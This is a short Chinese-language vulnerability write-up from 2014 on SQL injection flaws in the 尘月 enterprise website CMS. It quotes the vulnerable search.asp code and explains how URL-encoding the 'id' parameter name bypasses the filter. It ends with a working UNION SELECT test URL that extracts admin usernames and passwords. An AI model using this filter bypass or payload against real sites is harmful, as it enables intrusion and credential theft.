尘月网络企业网站管理系统漏洞

发布时间：2014-08-13 15:58:31作者：知识屋

company.asp中 get方式获取的变量id的值仅仅过滤空格和判断

值是否为空包含了一防注仅仅过滤了get方式传递进来的参数值

company.asp中却是 request.querystring("id") 也就是说不能使用 post

以及cookie注入但是防注却用的枫叶防注嘿嘿地球人都知道把变量id的i编码

%69 直接绕过另外 search.asp中

<%
if trim(request.QueryString("Search"))="" then
   if trim(request.Form("Area"))="" then
      Search="None"
   else
      Search=trim(request.Form("Area"))
   end if
else
   Search=trim(request.QueryString("Search"))
end if
KeyWord=trim(request.Form("KeyWord"))
select case Search
   case "None"
      response.write "<script language=javascript> alert(您没有选择检索范围，点击返回！);history.back(-1);</script>"
      response.end
   case "Pro"
      Locality="检索产品 >> 关键字："&KeyWord
   SQL = "SELECT id,LName,LAddtime FROM Products where LName like %"&KeyWord&"% or LKeyWord like %"&KeyWord&"% and LPutout=true ORDER BY id DESC"
   case "News"
      Locality="检索新闻 >> 关键字："&KeyWord
      SQL= "SELECT id,NewTitle,AddTime FROM News where NewTitle like %"&KeyWord&"% and Putout=true ORDER BY id DESC"
   case "zx"
      Locality="检索资讯 >> 关键字："&KeyWord
      SQL= "SELECT id,FileName,AddTime FROM zx where FileName like %"&KeyWord&"% and Putout=true ORDER BY id DESC"
   case "tc"
      Locality="检索套餐 >> 关键字："&KeyWord
      SQL= "SELECT id,Title,AddTime FROM tc where Title like %"&KeyWord&"% and Putout=true ORDER BY id DESC"
   case "Feedback"
      Locality="检索留言 >> 关键字："&KeyWord
      SQL= "SELECT * FROM Feedback where Title like %"&KeyWord&"% and Outpub=true ORDER BY id DESC"
   case "down"
      Locality="检索 >> 关键字："&KeyWord
      SQL= "SELECT id,FileName,AddTime FROM down where FileName like %"&KeyWord&"% and Putout=true ORDER BY id DESC"
end select
===========================
%>

看这里 KeyWord=trim(request.Form("KeyWord")) 是post了吧

注入吧没任何限制
测试方法:
?%69d=7%20or%201=2%20un%69on%20s%65lect%201,username,password,4,5,6,7,8%20fr%6Fm%20admin">http://127.0.0.1/Company.asp?%69d=7%20or%201=2%20un%69on%20s%65lect%201,username,password,4,5,6,7,8%20fr%6Fm%20admin

（免责声明：文章内容如涉及作品内容、版权和其它问题，请及时与我们联系，我们将在第一时间删除内容，文章内容仅供参考）